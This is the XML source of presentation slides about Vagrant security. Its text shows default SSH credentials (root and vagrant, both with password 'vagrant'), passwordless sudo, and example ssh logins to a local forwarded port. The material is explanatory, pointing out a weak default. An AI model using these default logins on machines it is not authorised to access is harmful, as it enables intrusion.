            <a:endParaRPr sz="11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  <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="732790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Password:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="498441"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(optional)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02839" y="966088"/>
            <a:ext cx="1466850" cy="1551940"/>
            <a:chOff x="2402839" y="966088"/>
            <a:chExt cx="1466850" cy="1551940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2405379" y="968628"/>
              <a:ext cx="0" cy="1546860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="1546860">
                  <a:moveTo>
                    <a:pt x="0" y="154660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62020" y="1549082"/>
              <a:ext cx="504190" cy="553720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="44767" y="312737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="551065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144068" y="320268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44767" y="312737"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="178777" y="322554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="317804" y="553580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270764" y="322554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178777" y="322554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="504189" h="553719">
                  <a:moveTo>
                    <a:pt x="176263" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176263" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297942" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260718" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504063" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263220" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176263" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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58077" y="1858753"/>
              <a:ext cx="150137" cy="2444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6792" y="1868570"/>
              <a:ext cx="145172" cy="23715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37343" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121678" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84518" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327863" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86969" y="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9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37343" y="1549082"/>
              <a:ext cx="328295" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121678" y="287832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84518" y="106603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327863" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86969" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="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63046" y="1438768"/>
              <a:ext cx="143348" cy="8707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56439" y="1268648"/>
              <a:ext cx="165733" cy="14832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51974" y="1310525"/>
              <a:ext cx="253365" cy="526415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="253364" h="526414">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="178777" y="298107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128981" y="523875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250659" y="526389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253174" y="243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9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51974" y="1310525"/>
              <a:ext cx="253365" cy="526415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="253364" h="526414">
                  <a:moveTo>
                    <a:pt x="128981" y="523875"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="178777" y="298107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253174" y="243357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250659" y="526389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128981" y="523875"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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51111" y="1152321"/>
              <a:ext cx="313690" cy="323215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="313689" h="323215">
                  <a:moveTo>
                    <a:pt x="295833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="301091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16878" y="323011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313423" y="18465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295833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51111" y="1152321"/>
              <a:ext cx="313690" cy="323215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="313689" h="323215">
                  <a:moveTo>
                    <a:pt x="0" y="301091"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="295833" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313423" y="18465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16878" y="323011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="301091"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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55886" y="1107554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4">
                  <a:moveTo>
                    <a:pt x="25298" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="15478" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7434" y="7462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997" y="15575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997" y="35385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7434" y="43453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15478" y="48901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25298" y="50901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35294" y="48901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43429" y="43453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48899" y="35385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50901" y="25527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48899" y="15575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43429" y="7462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35294" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25298" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FBB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55886" y="1107554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4">
                  <a:moveTo>
                    <a:pt x="50901" y="25527"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48899" y="35385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43429" y="43453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35294" y="48901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25298" y="50901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15478" y="48901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7434" y="43453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997" y="35385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997" y="15575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7434" y="7462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15478" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25298" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35294" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43429" y="7462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48899" y="15575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50901" y="25527"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="61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727451" y="2105673"/>
            <a:ext cx="59436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3655" marR="5080" indent="-21590">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Username:  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Password: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47919" y="2105673"/>
            <a:ext cx="92900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85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root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10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="498441"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(optional)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78965" y="1445069"/>
            <a:ext cx="1443355" cy="566420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1443355" h="566419">
                <a:moveTo>
                  <a:pt x="1160106" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1160106" y="90004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="90004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="475856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160106" y="475856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160106" y="565861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443037" y="282930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160106" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F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715007" y="1524901"/>
            <a:ext cx="117792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-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>without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120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password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100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(required)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8592" y="2707817"/>
            <a:ext cx="4246245" cy="4406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270">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-125" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>always </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>overwritten using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant.ssh.username </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant.ssh.password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Custom usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>typically </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>defined </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Vagrantile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-155" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25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43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589" y="190436"/>
            <a:ext cx="3766185" cy="238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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-155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VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215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sz="1200" spc="-195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SSH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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Root</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1850389">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>root@127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-p 2222  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>root@127.0.0.1s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>password: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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>14.04.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-30" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LTS 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>GNU/Linux 3.13.0-87-generic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="75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x86_64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)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...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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1678305">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="259"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>vagrant@127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-p 2222  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>vagrant@127.0.0.1s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>password: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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>14.04.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-30" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LTS 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>GNU/Linux 3.13.0-87-generic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="75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x86_64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)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...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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45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589" y="190436"/>
            <a:ext cx="4359910" cy="2757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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
